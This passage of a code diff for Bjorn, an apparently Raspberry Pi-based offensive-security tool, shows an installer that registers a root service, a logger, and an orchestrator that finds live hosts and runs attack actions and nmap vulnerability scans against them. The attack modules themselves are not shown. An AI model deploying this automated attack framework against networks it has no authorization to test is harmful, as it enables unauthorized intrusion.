for package in "${packages[@]}"; do
log "INFO" "Installing $package..."
apt-get install -y "$package"
check_success "Installed $package"
done
# Update nmap scripts
nmap --script-updatedb
check_success "Dependencies installation completed"
}
# Configure system limits
configure_system_limits() {
log "INFO" "Configuring system limits..."
# Configure /etc/security/limits.conf
cat >> /etc/security/limits.conf << EOF
* soft nofile 65535
* hard nofile 65535
root soft nofile 65535
root hard nofile 65535
EOF
# Configure systemd limits
sed -i 's/#DefaultLimitNOFILE=/DefaultLimitNOFILE=65535/' /etc/systemd/system.conf
sed -i 's/#DefaultLimitNOFILE=/DefaultLimitNOFILE=65535/' /etc/systemd/user.conf
# Create /etc/security/limits.d/90-nofile.conf
cat > /etc/security/limits.d/90-nofile.conf << EOF
root soft nofile 65535
root hard nofile 65535
EOF
# Configure sysctl
echo "fs.file-max = 2097152" >> /etc/sysctl.conf
sysctl -p
check_success "System limits configuration completed"
}
# Configure SPI and I2C
configure_interfaces() {
log "INFO" "Configuring SPI and I2C interfaces..."
# Enable SPI and I2C using raspi-config
raspi-config nonint do_spi 0
raspi-config nonint do_i2c 0
check_success "Interface configuration completed"
}
# Setup BJORN
setup_bjorn() {
log "INFO" "Setting up BJORN..."
# Create BJORN user if it doesn't exist
if ! id -u $BJORN_USER >/dev/null 2>&1; then
adduser --disabled-password --gecos "" $BJORN_USER
check_success "Created BJORN user"
fi
# Check for existing BJORN directory
cd /home/$BJORN_USER
if [ -d "Bjorn" ]; then
log "INFO" "Using existing BJORN directory"
echo -e "${GREEN}Using existing BJORN directory${NC}"
else
# No existing directory, proceed with clone
log "INFO" "Cloning BJORN repository"
git clone https://github.com/infinition/Bjorn.git
check_success "Cloned BJORN repository"
fi
cd Bjorn
# Install requirements with --break-system-packages flag
log "INFO" "Installing Python requirements..."
pip3 install -r requirements.txt --break-system-packages
check_success "Installed Python requirements"
# Set correct permissions
chown -R $BJORN_USER:$BJORN_USER /home/$BJORN_USER/Bjorn
chmod -R 755 /home/$BJORN_USER/Bjorn
# Add bjorn user to necessary groups
usermod -a -G spi,gpio,i2c $BJORN_USER
check_success "Added bjorn user to required groups"
}
# Configure services
setup_services() {
log "INFO" "Setting up system services..."
# Create kill_port_8000.sh script
cat > $BJORN_PATH/kill_port_8000.sh << 'EOF'
#!/bin/bash
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing PIDs using port $PORT: $PIDS"
kill -9 $PIDS
fi
EOF
chmod +x $BJORN_PATH/kill_port_8000.sh
# Create BJORN service
cat > /etc/systemd/system/bjorn.service << EOF
[Unit]
Description=Bjorn Service
DefaultDependencies=no
Before=basic.target
After=local-fs.target
[Service]
ExecStartPre=/home/bjorn/Bjorn/kill_port_8000.sh
ExecStart=/usr/bin/python3 /home/bjorn/Bjorn/Bjorn.py
WorkingDirectory=/home/bjorn/Bjorn
StandardOutput=inherit
StandardError=inherit
Restart=always
User=root
[Install]
WantedBy=multi-user.target
EOF
# Configure PAM
echo "session required pam_limits.so" >> /etc/pam.d/common-session
echo "session required pam_limits.so" >> /etc/pam.d/common-session-noninteractive
# Enable and start services
systemctl daemon-reload
systemctl enable bjorn.service
check_success "Services setup completed"
}
# Configure USB Gadget
configure_usb_gadget() {
log "INFO" "Configuring USB Gadget..."
# Modify cmdline.txt
sed -i 's/rootwait/rootwait modules-load=dwc2,g_ether/' /boot/firmware/cmdline.txt
# Modify config.txt
echo "dtoverlay=dwc2" >> /boot/firmware/config.txt
# Create USB gadget script
cat > /usr/local/bin/usb-gadget.sh << 'EOF'
#!/bin/bash
set -e
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: ECM network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/ecm.usb0
if [ -L configs/c.1/ecm.usb0 ]; then
rm configs/c.1/ecm.usb0
fi
ln -s functions/ecm.usb0 configs/c.1/
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
else
echo "Interface usb0 already configured."
fi
EOF
chmod +x /usr/local/bin/usb-gadget.sh
# Create USB gadget service
cat > /etc/systemd/system/usb-gadget.service << EOF
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
# Configure network interface
cat >> /etc/network/interfaces << EOF
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
EOF
# Enable and start services
systemctl daemon-reload
systemctl enable systemd-networkd
systemctl enable usb-gadget
systemctl start systemd-networkd
systemctl start usb-gadget
check_success "USB Gadget configuration completed"
}
# Verify installation
verify_installation() {
log "INFO" "Verifying installation..."
# Check if services are running
if ! systemctl is-active --quiet bjorn.service; then
log "WARNING" "BJORN service is not running"
else
log "SUCCESS" "BJORN service is running"
fi
# Check web interface
sleep 5
if curl -s http://localhost:8000 > /dev/null; then
log "SUCCESS" "Web interface is accessible"
else
log "WARNING" "Web interface is not responding"
fi
}
# Clean exit function
clean_exit() {
local exit_code=$1
if [ $exit_code -eq 0 ]; then
log "SUCCESS" "BJORN installation completed successfully!"
log "INFO" "Log file available at: $LOG_FILE"
else
log "ERROR" "BJORN installation failed!"
log "ERROR" "Check the log file for details: $LOG_FILE"
fi
exit $exit_code
}
# Main installation process
main() {
log "INFO" "Starting BJORN installation..."
# Check if script is run as root
if [ "$(id -u)" -ne 0 ]; then
echo "This script must be run as root. Please use 'sudo'."
exit 1
fi
echo -e "${BLUE}BJORN Installation Options:${NC}"
echo "1. Full installation (recommended)"
echo "2. Custom installation"
read -p "Choose an option (1/2): " install_option
case $install_option in
1)
CURRENT_STEP=1; show_progress "Checking system compatibility"
check_system_compatibility
CURRENT_STEP=2; show_progress "Installing system dependencies"
install_dependencies
CURRENT_STEP=3; show_progress "Configuring system limits"
configure_system_limits
CURRENT_STEP=4; show_progress "Configuring interfaces"
configure_interfaces
CURRENT_STEP=5; show_progress "Setting up BJORN"
setup_bjorn
CURRENT_STEP=6; show_progress "Configuring USB Gadget"
configure_usb_gadget
CURRENT_STEP=7; show_progress "Setting up services"
setup_services
CURRENT_STEP=8; show_progress "Verifying installation"
verify_installation
;;
2)
echo "Custom installation - select components to install:"
read -p "Install dependencies? (y/n): " deps
read -p "Configure system limits? (y/n): " limits
read -p "Configure interfaces? (y/n): " interfaces
read -p "Setup BJORN? (y/n): " bjorn
read -p "Configure USB Gadget? (y/n): " usb_gadget
read -p "Setup services? (y/n): " services
[ "$deps" = "y" ] && install_dependencies
[ "$limits" = "y" ] && configure_system_limits
[ "$interfaces" = "y" ] && configure_interfaces
[ "$bjorn" = "y" ] && setup_bjorn
[ "$usb_gadget" = "y" ] && configure_usb_gadget
[ "$services" = "y" ] && setup_services
verify_installation
;;
*)
log "ERROR" "Invalid option selected"
clean_exit 1
;;
esac
log "SUCCESS" "BJORN installation completed!"
log "INFO" "Please reboot your system to apply all changes."
echo -e "\n${GREEN}Installation completed successfully!${NC}"
echo -e "${YELLOW}Important notes:${NC}"
echo "1. If configuring Windows PC for USB gadget connection:"
echo " - Set static IP: 172.20.2.2"
echo " - Subnet Mask: 255.255.255.0"
echo " - Default Gateway: 172.20.2.1"
echo " - DNS Servers: 8.8.8.8, 8.8.4.4"
echo "2. Web interface will be available at: http://[device-ip]:8000"
echo "3. Make sure your e-Paper HAT (2.13-inch) is properly connected"
read -p "Would you like to reboot now? (y/n): " reboot_now
if [ "$reboot_now" = "y" ]; then
if reboot; then
log "INFO" "System reboot initiated."
else
log "ERROR" "Failed to initiate reboot."
exit 1
fi
else
echo -e "${YELLOW}Reboot your system to apply all changes & run Bjorn service.${NC}"
fi
}
main

11
kill_port_8000.sh Normal file
View File

@@ -0,0 +1,11 @@
#!/bin/bash
# Script to kill processes using port 8000
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing the following PIDs using port $PORT: $PIDS"
kill -9 $PIDS
else
echo "No processes found using port $PORT"
fi

136
logger.py Normal file
View File

@@ -0,0 +1,136 @@
#logger.py
# Description:
# This file, logger.py, is responsible for setting up a robust logging system for the Bjorn project. It defines custom logging levels and formats,
# integrates with the Rich library for enhanced console output, and ensures logs are written to rotating files for persistence.
#
# Key functionalities include:
# - Defining a custom log level "SUCCESS" to log successful operations distinctively.
# - Creating a vertical filter to exclude specific log messages based on their content.
# - Setting up a logger class (`Logger`) that initializes logging handlers for both console and file output.
# - Utilizing Rich for console logging with custom themes for different log levels, providing a more readable and visually appealing log output.
# - Ensuring log files are written to a specified directory, with file rotation to manage log file sizes and backups.
# - Providing methods to log messages at various levels (debug, info, warning, error, critical, success).
# - Allowing dynamic adjustment of log levels and the ability to disable logging entirely.
import logging
from logging.handlers import RotatingFileHandler
import os
from rich.console import Console
from rich.logging import RichHandler
from rich.theme import Theme
# Define custom log level "SUCCESS"
SUCCESS_LEVEL_NUM = 25
logging.addLevelName(SUCCESS_LEVEL_NUM, "SUCCESS")
def success(self, message, *args, **kwargs):
if self.isEnabledFor(SUCCESS_LEVEL_NUM):
self._log(SUCCESS_LEVEL_NUM, message, args, **kwargs)
logging.Logger.success = success
class VerticalFilter(logging.Filter):
def filter(self, record):
return 'Vertical' not in record.getMessage()
class Logger:
LOGS_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data', 'logs')
def __init__(self, name, level=logging.DEBUG, enable_file_logging=True):
self.logger = logging.getLogger(name)
self.logger.setLevel(level)
self.enable_file_logging = enable_file_logging
# Define custom log level styles
custom_theme = Theme({
"debug": "yellow",
"info": "blue",
"warning": "yellow",
"error": "bold red",
"critical": "bold magenta",
"success": "bold green"
})
console = Console(theme=custom_theme)
# Create console handler with rich and set level
console_handler = RichHandler(console=console, show_time=False, show_level=False, show_path=False, log_time_format="%Y-%m-%d %H:%M:%S")
console_handler.setLevel(level)
console_formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
console_handler.setFormatter(console_formatter)
# Add filter to console handler
vertical_filter = VerticalFilter()
console_handler.addFilter(vertical_filter)
# Add console handler to the logger
self.logger.addHandler(console_handler)
if self.enable_file_logging:
# Ensure the log folder exists
os.makedirs(self.LOGS_DIR, exist_ok=True)
log_file_path = os.path.join(self.LOGS_DIR, f"{name}.log")
# Create file handler and set level
file_handler = RotatingFileHandler(log_file_path, maxBytes=5*1024*1024, backupCount=2)
file_handler.setLevel(level)
file_formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
file_handler.setFormatter(file_formatter)
# Add filter to file handler
file_handler.addFilter(vertical_filter)
# Add file handler to the logger
self.logger.addHandler(file_handler)
def set_level(self, level):
self.logger.setLevel(level)
for handler in self.logger.handlers:
handler.setLevel(level)
def debug(self, message):
self.logger.debug(message)
def info(self, message):
self.logger.info(message)
def warning(self, message):
self.logger.warning(message)
def error(self, message):
self.logger.error(message)
def critical(self, message):
self.logger.critical(message)
def success(self, message):
self.logger.success('\n' + message) # Add newline for better readability
def disable_logging(self):
logging.disable(logging.CRITICAL)
# Example usage
if __name__ == "__main__":
# Change enable_file_logging to False to disable file logging
log = Logger(name="MyLogger", level=logging.DEBUG, enable_file_logging=False)
log.debug("This is a debug message")
log.info("This is an info message")
log.warning("This is a warning message")
log.error("This is an error message")
log.critical("This is a critical message")
log.success("This is a success message")
# Change log level
log.set_level(logging.WARNING)
log.debug("This debug message should not appear")
log.info("This info message should not appear")
log.warning("This warning message should appear")
# Disable logging
log.disable_logging()
log.error("This error message should not appear")

383
orchestrator.py Normal file
View File

@@ -0,0 +1,383 @@
# orchestrator.py
# Description:
# This file, orchestrator.py, is the heuristic Bjorn brain, and it is responsible for coordinating and executing various network scanning and offensive security actions
# It manages the loading and execution of actions, handles retries for failed and successful actions,
# and updates the status of the orchestrator.
#
# Key functionalities include:
# - Initializing and loading actions from a configuration file, including network and vulnerability scanners.
# - Managing the execution of actions on network targets, checking for open ports and handling retries based on success or failure.
# - Coordinating the execution of parent and child actions, ensuring actions are executed in a logical order.
# - Running the orchestrator cycle to continuously check for and execute actions on available network targets.
# - Handling and updating the status of the orchestrator, including scanning for new targets and performing vulnerability scans.
# - Implementing threading to manage concurrent execution of actions with a semaphore to limit active threads.
# - Logging events and errors to ensure maintainability and ease of debugging.
# - Handling graceful degradation by managing retries and idle states when no new targets are found.
import json
import importlib
import time
import logging
import sys
import threading
from datetime import datetime, timedelta
from actions.nmap_vuln_scanner import NmapVulnScanner
from init_shared import shared_data
from logger import Logger
logger = Logger(name="orchestrator.py", level=logging.DEBUG)
class Orchestrator:
def __init__(self):
"""Initialise the orchestrator"""
self.shared_data = shared_data
self.actions = [] # List of actions to be executed
self.standalone_actions = [] # List of standalone actions to be executed
self.failed_scans_count = 0 # Count the number of failed scans
self.network_scanner = None
self.last_vuln_scan_time = datetime.min # Set the last vulnerability scan time to the minimum datetime value
self.load_actions() # Load all actions from the actions file
actions_loaded = [action.__class__.__name__ for action in self.actions + self.standalone_actions] # Get the names of the loaded actions
logger.info(f"Actions loaded: {actions_loaded}")
self.semaphore = threading.Semaphore(10) # Limit the number of active threads to 10
def load_actions(self):
"""Load all actions from the actions file"""
self.actions_dir = self.shared_data.actions_dir
with open(self.shared_data.actions_file, 'r') as file:
actions_config = json.load(file)
for action in actions_config:
module_name = action["b_module"]
if module_name == 'scanning':
self.load_scanner(module_name)
elif module_name == 'nmap_vuln_scanner':
self.load_nmap_vuln_scanner(module_name)
else:
self.load_action(module_name, action)
def load_scanner(self, module_name):
"""Load the network scanner"""
module = importlib.import_module(f'actions.{module_name}')
b_class = getattr(module, 'b_class')
self.network_scanner = getattr(module, b_class)(self.shared_data)
def load_nmap_vuln_scanner(self, module_name):
"""Load the nmap vulnerability scanner"""
self.nmap_vuln_scanner = NmapVulnScanner(self.shared_data)
def load_action(self, module_name, action):
"""Load an action from the actions file"""
module = importlib.import_module(f'actions.{module_name}')
try:
b_class = action["b_class"]
action_instance = getattr(module, b_class)(self.shared_data)
action_instance.action_name = b_class
action_instance.port = action.get("b_port")
action_instance.b_parent_action = action.get("b_parent")
if action_instance.port == 0:
self.standalone_actions.append(action_instance)
else:
self.actions.append(action_instance)
except AttributeError as e:
logger.error(f"Module {module_name} is missing required attributes: {e}")
def process_alive_ips(self, current_data):
"""Process all IPs with alive status set to 1"""
any_action_executed = False
action_executed_status = None
for action in self.actions:
for row in current_data:
if row["Alive"] != '1':
continue
ip, ports = row["IPs"], row["Ports"].split(';')
action_key = action.action_name
if action.b_parent_action is None:
with self.semaphore:
if self.execute_action(action, ip, ports, row, action_key, current_data):
action_executed_status = action_key
any_action_executed = True
self.shared_data.bjornorch_status = action_executed_status
for child_action in self.actions:
if child_action.b_parent_action == action_key:
with self.semaphore:
if self.execute_action(child_action, ip, ports, row, child_action.action_name, current_data):
action_executed_status = child_action.action_name
self.shared_data.bjornorch_status = action_executed_status
break
break
for child_action in self.actions:
if child_action.b_parent_action:
action_key = child_action.action_name
for row in current_data:
ip, ports = row["IPs"], row["Ports"].split(';')
with self.semaphore:
if self.execute_action(child_action, ip, ports, row, action_key, current_data):
action_executed_status = child_action.action_name
any_action_executed = True
self.shared_data.bjornorch_status = action_executed_status
break
return any_action_executed
def execute_action(self, action, ip, ports, row, action_key, current_data):
"""Execute an action on a target"""
if hasattr(action, 'port') and str(action.port) not in ports:
return False
# Check parent action status
if action.b_parent_action:
parent_status = row.get(action.b_parent_action, "")
if 'success' not in parent_status:
return False # Skip child action if parent action has not succeeded
# Check if the action is already successful and if retries are disabled for successful actions
if 'success' in row[action_key]:
if not self.shared_data.retry_success_actions:
return False
else:
try:
last_success_time = datetime.strptime(row[action_key].split('_')[1] + "_" + row[action_key].split('_')[2], "%Y%m%d_%H%M%S")
if datetime.now() < last_success_time + timedelta(seconds=self.shared_data.success_retry_delay):
retry_in_seconds = (last_success_time + timedelta(seconds=self.shared_data.success_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping action {action.action_name} for {ip}:{action.port} due to success retry delay, retry possible in: {formatted_retry_in}")
return False # Skip if the success retry delay has not passed
except ValueError as ve:
logger.error(f"Error parsing last success time for {action.action_name}: {ve}")
last_failed_time_str = row.get(action_key, "")
if 'failed' in last_failed_time_str:
try:
last_failed_time = datetime.strptime(last_failed_time_str.split('_')[1] + "_" + last_failed_time_str.split('_')[2], "%Y%m%d_%H%M%S")
if datetime.now() < last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay):
retry_in_seconds = (last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping action {action.action_name} for {ip}:{action.port} due to failed retry delay, retry possible in: {formatted_retry_in}")
return False # Skip if the retry delay has not passed
except ValueError as ve:
logger.error(f"Error parsing last failed time for {action.action_name}: {ve}")
try:
logger.info(f"Executing action {action.action_name} for {ip}:{action.port}")
self.shared_data.bjornstatustext2 = ip
result = action.execute(ip, str(action.port), row, action_key)
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if result == 'success':
row[action_key] = f'success_{timestamp}'
else:
row[action_key] = f'failed_{timestamp}'
self.shared_data.write_data(current_data)
return result == 'success'
except Exception as e:
logger.error(f"Action {action.action_name} failed: {e}")
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
row[action_key] = f'failed_{timestamp}'
self.shared_data.write_data(current_data)
return False
def execute_standalone_action(self, action, current_data):
"""Execute a standalone action"""
row = next((r for r in current_data if r["MAC Address"] == "STANDALONE"), None)
if not row:
row = {
"MAC Address": "STANDALONE",
"IPs": "STANDALONE",
"Hostnames": "STANDALONE",
"Ports": "0",
"Alive": "0"
}
current_data.append(row)
action_key = action.action_name
if action_key not in row:
row[action_key] = ""
# Check if the action is already successful and if retries are disabled for successful actions
if 'success' in row[action_key]:
if not self.shared_data.retry_success_actions:
return False
else:
try:
last_success_time = datetime.strptime(row[action_key].split('_')[1] + "_" + row[action_key].split('_')[2], "%Y%m%d_%H%M%S")
if datetime.now() < last_success_time + timedelta(seconds=self.shared_data.success_retry_delay):
retry_in_seconds = (last_success_time + timedelta(seconds=self.shared_data.success_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping standalone action {action.action_name} due to success retry delay, retry possible in: {formatted_retry_in}")
return False # Skip if the success retry delay has not passed
except ValueError as ve:
logger.error(f"Error parsing last success time for {action.action_name}: {ve}")
last_failed_time_str = row.get(action_key, "")
if 'failed' in last_failed_time_str:
try:
last_failed_time = datetime.strptime(last_failed_time_str.split('_')[1] + "_" + last_failed_time_str.split('_')[2], "%Y%m%d_%H%M%S")
if datetime.now() < last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay):
retry_in_seconds = (last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping standalone action {action.action_name} due to failed retry delay, retry possible in: {formatted_retry_in}")
return False # Skip if the retry delay has not passed
except ValueError as ve:
logger.error(f"Error parsing last failed time for {action.action_name}: {ve}")
try:
logger.info(f"Executing standalone action {action.action_name}")
result = action.execute()
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if result == 'success':
row[action_key] = f'success_{timestamp}'
logger.info(f"Standalone action {action.action_name} executed successfully")
else:
row[action_key] = f'failed_{timestamp}'
logger.error(f"Standalone action {action.action_name} failed")
self.shared_data.write_data(current_data)
return result == 'success'
except Exception as e:
logger.error(f"Standalone action {action.action_name} failed: {e}")
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
row[action_key] = f'failed_{timestamp}'
self.shared_data.write_data(current_data)
return False
def run(self):
"""Run the orchestrator cycle to execute actions"""
#Run the scanner a first time to get the initial data
self.shared_data.bjornorch_status = "NetworkScanner"
self.shared_data.bjornstatustext2 = "First scan..."
self.network_scanner.scan()
self.shared_data.bjornstatustext2 = ""
while not self.shared_data.orchestrator_should_exit:
current_data = self.shared_data.read_data()
any_action_executed = False
action_executed_status = None
action_retry_pending = False
any_action_executed = self.process_alive_ips(current_data)
for action in self.actions:
for row in current_data:
if row["Alive"] != '1':
continue
ip, ports = row["IPs"], row["Ports"].split(';')
action_key = action.action_name
if action.b_parent_action is None:
with self.semaphore:
if self.execute_action(action, ip, ports, row, action_key, current_data):
action_executed_status = action_key
any_action_executed = True
self.shared_data.bjornorch_status = action_executed_status
for child_action in self.actions:
if child_action.b_parent_action == action_key:
with self.semaphore:
if self.execute_action(child_action, ip, ports, row, child_action.action_name, current_data):
action_executed_status = child_action.action_name
self.shared_data.bjornorch_status = action_executed_status
break
break
for child_action in self.actions:
if child_action.b_parent_action:
action_key = child_action.action_name
for row in current_data:
ip, ports = row["IPs"], row["Ports"].split(';')
with self.semaphore:
if self.execute_action(child_action, ip, ports, row, action_key, current_data):
action_executed_status = child_action.action_name
any_action_executed = True
self.shared_data.bjornorch_status = action_executed_status
break
self.shared_data.write_data(current_data)
if not any_action_executed:
self.shared_data.bjornorch_status = "IDLE"
self.shared_data.bjornstatustext2 = ""
logger.info("No available targets. Running network scan...")
if self.network_scanner:
self.shared_data.bjornorch_status = "NetworkScanner"
self.network_scanner.scan()
# Relire les données mises à jour après le scan
current_data = self.shared_data.read_data()
any_action_executed = self.process_alive_ips(current_data)
if self.shared_data.scan_vuln_running:
current_time = datetime.now()
if current_time >= self.last_vuln_scan_time + timedelta(seconds=self.shared_data.scan_vuln_interval):
try:
logger.info("Starting vulnerability scans...")
for row in current_data:
if row["Alive"] == '1':
ip = row["IPs"]
scan_status = row.get("NmapVulnScanner", "")
# Check success retry delay
if 'success' in scan_status:
last_success_time = datetime.strptime(scan_status.split('_')[1] + "_" + scan_status.split('_')[2], "%Y%m%d_%H%M%S")
if not self.shared_data.retry_success_actions:
logger.warning(f"Skipping vulnerability scan for {ip} because retry on success is disabled.")
continue # Skip if retry on success is disabled
if datetime.now() < last_success_time + timedelta(seconds=self.shared_data.success_retry_delay):
retry_in_seconds = (last_success_time + timedelta(seconds=self.shared_data.success_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping vulnerability scan for {ip} due to success retry delay, retry possible in: {formatted_retry_in}")
# Skip if the retry delay has not passed
continue
# Check failed retry delay
if 'failed' in scan_status:
last_failed_time = datetime.strptime(scan_status.split('_')[1] + "_" + scan_status.split('_')[2], "%Y%m%d_%H%M%S")
if datetime.now() < last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay):
retry_in_seconds = (last_failed_time + timedelta(seconds=self.shared_data.failed_retry_delay) - datetime.now()).seconds
formatted_retry_in = str(timedelta(seconds=retry_in_seconds))
logger.warning(f"Skipping vulnerability scan for {ip} due to failed retry delay, retry possible in: {formatted_retry_in}")
continue
with self.semaphore:
result = self.nmap_vuln_scanner.execute(ip, row, "NmapVulnScanner")
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if result == 'success':
row["NmapVulnScanner"] = f'success_{timestamp}'
else:
row["NmapVulnScanner"] = f'failed_{timestamp}'
self.shared_data.write_data(current_data)
self.last_vuln_scan_time = current_time
except Exception as e:
logger.error(f"Error during vulnerability scan: {e}")
else:
logger.warning("No network scanner available.")
self.failed_scans_count += 1
if self.failed_scans_count >= 1:
for action in self.standalone_actions:
with self.semaphore:
if self.execute_standalone_action(action, current_data):
self.failed_scans_count = 0
break
idle_start_time = datetime.now()
idle_end_time = idle_start_time + timedelta(seconds=self.shared_data.scan_interval)
while datetime.now() < idle_end_time:
if self.shared_data.orchestrator_should_exit:
break
remaining_time = (idle_end_time - datetime.now()).seconds
self.shared_data.bjornorch_status = "IDLE"
self.shared_data.bjornstatustext2 = ""
sys.stdout.write('\x1b[1A\x1b[2K')
logger.warning(f"Scanner did not find any new targets. Next scan in: {remaining_time} seconds")
time.sleep(1)
self.failed_scans_count = 0
continue
else:
self.failed_scans_count = 0
action_retry_pending = True
if action_retry_pending:
self.failed_scans_count = 0
if __name__ == "__main__":
orchestrator = Orchestrator()
orchestrator.run()

15
requirements.txt Normal file
View File

@@ -0,0 +1,15 @@
RPi.GPIO==0.7.1
spidev==3.5
Pillow==9.4.0
numpy==2.1.3
rich==13.9.4
pandas==2.2.3
netifaces==0.11.0
ping3==4.0.8
get-mac==0.9.2
paramiko==3.5.0
smbprotocol==1.14.0
pysmb==1.2.10
pymysql==1.1.1
sqlalchemy==2.0.36
python-nmap==0.7.1

0
resources/__init__.py Normal file
View File

File diff suppressed because it is too large Load Diff

File diff suppressed because one or more lines are too long

BIN
resources/fonts/Arial.ttf Normal file

Binary file not shown.

BIN
resources/fonts/ArialB.TTF Normal file

Binary file not shown.

BIN
resources/fonts/Cartoon.ttf Normal file

Binary file not shown.

BIN
resources/fonts/Creamy.ttf Normal file

Binary file not shown.

BIN
resources/fonts/Viking.TTF Normal file

Binary file not shown.

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 158 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 134 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 446 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 670 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 938 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 670 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 14 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 134 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 670 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 950 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 174 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Some files were not shown because too many files have changed in this diff Show More